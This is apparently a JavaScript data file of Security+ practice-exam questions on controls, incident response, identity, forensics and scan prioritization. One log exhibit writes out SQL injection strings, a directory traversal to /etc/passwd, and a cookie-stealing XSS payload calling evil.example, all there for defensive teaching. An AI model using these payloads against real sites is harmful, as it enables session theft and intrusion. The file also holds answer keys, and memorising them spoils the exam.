/* Exam PBQs — 5 per exam. Types: match | order | exhibit | hashid | fwrule | risk
   hashid, fwrule and risk generate a fresh problem every attempt (generators live in index.html).
   exhibit = one exhibit with several sub-questions (first option correct; the engine shuffles). */
export const EXAM_PBQS = {
a: [
 {id:"pa1",obj:"1.1",type:"match",d:1,cat:"controls",title:"Classify the controls",
  prompt:"Drag each category + type pair onto the control it fits best.",
  pairs:[["Bollards outside the data center entrance","Physical · Preventive"],["Security awareness training program","Managerial · Preventive"],["SIEM alerting on failed logins","Technical · Detective"],["Restoring from backup after ransomware","Technical · Corrective"],["Extra logging around an unpatchable legacy host","Technical · Compensating"],["Acceptable use policy that staff must sign","Managerial · Directive"],["Guard checking badges at the lobby","Operational · Preventive"]],
  why:"Category asks WHO or WHAT implements it (technical, managerial, operational, physical); type asks WHEN or HOW it acts (preventive, deterrent, detective, corrective, compensating, directive). Pair the two axes."},
 {id:"pa2",obj:"4.8",type:"order",d:4,cat:"ir",title:"Order the incident response process",
  prompt:"A phishing email led to a compromised workstation. Drag the SY0-701 process phases into order.",
  steps:["Preparation: playbooks, tooling, trained responders in place","Detection: EDR alert on the workstation is triaged","Analysis: scope, IOCs and affected accounts identified","Containment: isolate the host, disable the account, block the sender","Eradication: remove the malware, reset credentials, close the vector","Recovery: reimage, restore data, return to production with monitoring","Lessons learned: post-incident review feeds back into preparation"],
  why:"Preparation, detection, analysis, containment, eradication, recovery, lessons learned. When the exam asks what to do NEXT after confirming an incident, the answer is containment."},
 {id:"pa3",obj:"1.4",type:"hashid",d:1,cat:"crypto",title:"Identify the hash",prompt:"Read the digest, name the algorithm, give its bit length."},
 {id:"pa4",obj:"4.9",type:"exhibit",d:4,cat:"ops",title:"Exhibit: read the authentication log",
  setup:"A hospital SOC receives the following SIEM entries for a nurse's account.",
  out:"07:58:12  LOGIN OK      user=r.patel  src=10.40.12.55   geo=Cincinnati US  mfa=push\n08:03:40  LOGIN OK      user=r.patel  src=185.220.101.9  geo=Frankfurt DE   mfa=push\n08:04:02  RULE ADDED    mailbox=r.patel  action=forward-all  to=rpatel.backup@mail-relay.example\n08:04:30  LOGIN FAIL x6 user=r.patel  src=185.220.101.9  reason=bad_password\n08:05:10  MFA PROMPT    user=r.patel  result=approved   src=185.220.101.9",
  qs:[
   {q:"Which indicator MOST strongly suggests the account is compromised?",o:["Impossible travel: two successful logins 5 minutes apart from Cincinnati and Frankfurt","Six failed passwords at 08:04","The user logged in before 08:00","MFA push was used instead of a hardware key"],x:"Two successful sessions from continents apart within minutes is the impossible-travel indicator. Failed passwords alone could be a typo; login time and MFA method are normal."},
   {q:"What does the 08:04:02 entry MOST likely represent?",o:["Persistence and exfiltration: the attacker set an auto-forward so mail keeps flowing out even after a password reset","A legitimate out-of-office rule","A mail-server maintenance task","Evidence the account was locked out"],x:"External auto-forward rules are a classic business email compromise step: they survive credential resets and quietly copy every message to the attacker."},
   {q:"What does the 08:05:10 entry suggest about the MFA control?",o:["The user approved a push they did not initiate (MFA fatigue / prompt bombing), so number matching or a phishing-resistant factor is needed","MFA is working as designed","The attacker has the user's hardware token","MFA was never enabled on the account"],x:"A push approved from the attacker's IP after a burst of failures is prompt-bombing: the victim tapped Approve to make the prompts stop. Number matching or FIDO2 keys defeat it."},
   {q:"Which of the following is the BEST FIRST action?",o:["Disable the account, revoke all sessions and tokens, and remove the forwarding rule","Email the user to ask whether they are traveling","Reset the password only","Open a ticket with the mail vendor"],x:"Contain first: cut the attacker's access (account, sessions, rule). Asking the user or resetting only the password leaves active sessions and the forward in place."}
  ],
  why:"Impossible travel plus a new external forward plus an approved MFA push after failures = takeover with MFA fatigue. Contain (disable, revoke, remove rule), then investigate."},
 {id:"pa5",obj:"5.2",type:"risk",d:5,cat:"gov",title:"Risk math: SLE, ALE, cost-benefit",prompt:"Compute the loss figures and decide whether the control is worth buying."}
],
b: [
 {id:"pb1",obj:"3.3",type:"match",d:3,cat:"data",title:"Match the data protection method to the need",
  prompt:"Pair each requirement with the method that satisfies it.",
  pairs:[["Store card numbers so the app can reuse them without holding the real PAN","Tokenization"],["Show support staff only the last four digits of an SSN","Data masking"],["Prove a downloaded installer was not altered","Hashing"],["Keep EU customer data inside EU data centers","Data sovereignty / geographic restriction"],["Protect a laptop's disk if it is stolen","Full-disk encryption (data at rest)"],["Protect credentials crossing the internet","TLS (data in transit)"],["Limit which departments can open HR files","Permission restrictions / segmentation"]],
  why:"Match the method to the data STATE and the goal: tokenization substitutes, masking hides part, hashing proves integrity, encryption protects confidentiality at rest or in transit, sovereignty is about location."},
 {id:"pb2",obj:"1.4",type:"order",d:1,cat:"crypto",title:"Order a certificate issuance",
  prompt:"A web team needs a TLS certificate for a new public site. Drag the steps into order.",
  steps:["Generate a key pair on the server; the private key never leaves it","Create a certificate signing request (CSR) containing the public key and identity","Submit the CSR to the certificate authority","CA validates domain control (and organization, if OV/EV)","CA signs and issues the certificate","Install the certificate and intermediate chain on the server","Monitor expiry and revoke via CRL/OCSP if the key is compromised"],
  why:"Key pair first, CSR carries only the public key, CA validates then signs, install with the chain, then manage the lifecycle. The private key is never sent to the CA."},
 {id:"pb3",obj:"3.2",type:"fwrule",d:3,cat:"netsec",title:"Firewall rule evaluation",prompt:"Walk the rule table top-down for the packet shown."},
 {id:"pb4",obj:"2.4",type:"exhibit",d:2,cat:"attacks",title:"Exhibit: web server log",
  setup:"A cloud startup's web application firewall is in monitor-only mode. The access log shows these requests from one client in under a minute.",
  out:"203.0.113.77 GET /login?user=admin'--&pass=x                       200\n203.0.113.77 GET /login?user=admin' OR '1'='1&pass=x               200\n203.0.113.77 GET /search?q=<script>document.location='http://evil.example/c?'+document.cookie</script> 200\n203.0.113.77 GET /files?name=../../../../etc/passwd                 403\n203.0.113.77 GET /api/orders?id=1000                                200\n203.0.113.77 GET /api/orders?id=1001                                200\n203.0.113.77 GET /api/orders?id=1002                                200",
  qs:[
   {q:"What are the first two requests attempting?",o:["SQL injection to bypass authentication","Cross-site scripting","Directory traversal","Credential stuffing with a leaked password list"],x:"Quote-and-comment (admin'--) and the always-true OR '1'='1 are authentication-bypass SQL injection payloads. XSS uses script tags; traversal uses ../; stuffing uses many real credential pairs."},
   {q:"What is the third request attempting, and who is the victim?",o:["Reflected cross-site scripting that steals another user's session cookie","A denial of service against the search index","SQL injection against the search table","A brute-force attack on the search function"],x:"The script tag sends document.cookie to an attacker host; if the search page echoes input, any user tricked into that URL leaks their session. The server is the carrier, the user is the victim."},
   {q:"The 403 on the fourth request shows which control worked?",o:["Input validation or path restriction blocked directory traversal","The WAF blocked the request","Rate limiting blocked the client","TLS prevented the download"],x:"../ sequences reaching for /etc/passwd is directory traversal; a 403 means the app or web server refused the path. The WAF is in monitor-only mode, so it did not block."},
   {q:"What do the last three requests suggest, and what is the BEST fix?",o:["Sequential IDs are being enumerated (insecure direct object reference); enforce authorization on every object and use non-guessable IDs","Normal browsing; no action","A buffer overflow; patch the API","A DDoS; add more capacity"],x:"Walking id=1000, 1001, 1002 with 200 responses means the API returns other customers' orders without checking ownership. Server-side authorization per object is the fix."}
  ],
  why:"Read payloads: quotes and OR 1=1 are SQLi, script tags are XSS, ../ is traversal, sequential IDs are IDOR. Input validation and server-side authorization are the fixes; move the WAF to blocking."},
 {id:"pb5",obj:"5.2",type:"risk",d:5,cat:"gov",title:"Risk math: SLE, ALE, cost-benefit",prompt:"Compute the loss figures and decide whether the control is worth buying."}
],
c: [
 {id:"pc1",obj:"4.6",type:"match",d:4,cat:"iam",title:"Match the identity protocol to the job",
  prompt:"Pair each need with the protocol or technology that fits.",
  pairs:[["Browser SSO from the company IdP into a SaaS app using XML assertions","SAML"],["Let a third-party app post to a user's calendar without their password","OAuth 2.0"],["Add an ID token so the app learns WHO logged in, on top of OAuth","OpenID Connect"],["Look up group membership in the corporate directory over an encrypted channel","LDAPS"],["Per-command authorization for network admins on switches","TACACS+"],["Authenticate Wi-Fi users through the access point to a central server","RADIUS (802.1X/EAP)"],["Ticket-based domain authentication that breaks when clocks drift","Kerberos"]],
  why:"SAML = SSO assertions, OAuth = delegated authorization, OIDC = identity on OAuth, LDAP(S) = directory queries, TACACS+ = device admin, RADIUS = network access, Kerberos = tickets and time."},
 {id:"pc2",obj:"4.8",type:"order",d:4,cat:"ir",title:"Order the forensic acquisition by volatility",
  prompt:"A server is suspected of running an in-memory implant. Drag the evidence sources into the order they must be captured.",
  steps:["CPU registers and cache","RAM contents and running processes","Network connections, routing and ARP tables","Temporary files and swap space","Disk image","Remote logs, backups and archives"],eq:[[1,2]],
  why:"Capture what disappears first: registers, then memory and process state, then network state, temp/swap, disk, and finally remote logs and archives that persist regardless. Document chain of custody at every step."},
 {id:"pc3",obj:"1.4",type:"hashid",d:1,cat:"crypto",title:"Identify the hash",prompt:"Read the digest, name the algorithm, give its bit length."},
 {id:"pc4",obj:"4.3",type:"exhibit",d:4,cat:"ops",title:"Exhibit: vulnerability scan findings",
  setup:"An MSP runs a credentialed scan for a small law firm. Prioritize the response.",
  out:"ID   HOST            FINDING                                   CVSS  EXPLOIT  EXPOSURE\n1    web01 (DMZ)     Apache 2.4.49 path traversal CVE-2021-41773 9.8   public   internet\n2    file01 (LAN)    SMBv1 enabled                             7.5   public   internal\n3    hr-pc07 (LAN)   Missing browser update                    6.1   none     internal\n4    print01 (LAN)   Default admin credentials                 8.8   trivial  internal\n5    web01 (DMZ)     TLS 1.0 enabled                           5.3   none     internet\n6    db01 (LAN)      Self-signed certificate                   4.3   none     internal",
  qs:[
   {q:"Which finding should be remediated FIRST?",o:["1: critical CVSS, public exploit, internet-facing","4: default credentials are trivial to abuse","2: SMBv1 is what WannaCry used","5: TLS 1.0 on an internet host"],x:"Prioritize by severity, exploitability AND exposure together: 9.8 with a public exploit on an internet-facing host is the most likely to be exploited today."},
   {q:"Finding 4 has no CVE. What is the BEST classification and fix?",o:["Misconfiguration; change the default password and restrict management access","Zero-day; wait for a patch","False positive; ignore","Hardware vulnerability; replace the printer"],x:"Default credentials are a configuration weakness, not a software flaw. Change them and limit who can reach the admin interface; no patch will fix it."},
   {q:"The firm says file01 cannot be upgraded because a legacy scanner needs SMBv1. What is the appropriate response?",o:["Segment and restrict access to file01, document an exception with a compensating control, and set a review date","Ignore the finding since the business accepted it","Disable SMB entirely","Mark it as a false positive"],x:"When patching is not possible, the vulnerability-response options are compensating controls plus a documented exception, not silent acceptance."},
   {q:"After patching web01, what confirms the work is done?",o:["Rescan web01 and verify finding 1 no longer appears","Close the ticket when the admin says it is patched","Wait for the next quarterly scan","Check the CVE page"],x:"Validation means rescanning (or otherwise verifying) that the finding is gone. Ticket notes and vendor pages do not prove the fix is in place."}
  ],
  why:"Prioritize on CVSS × exploit availability × exposure, classify findings correctly (misconfiguration vs software flaw), use exceptions with compensating controls when you cannot patch, and validate with a rescan."},
 {id:"pc5",obj:"3.2",type:"fwrule",d:3,cat:"netsec",title:"Firewall rule evaluation",prompt:"Walk the rule table top-down for the packet shown."}
]
};
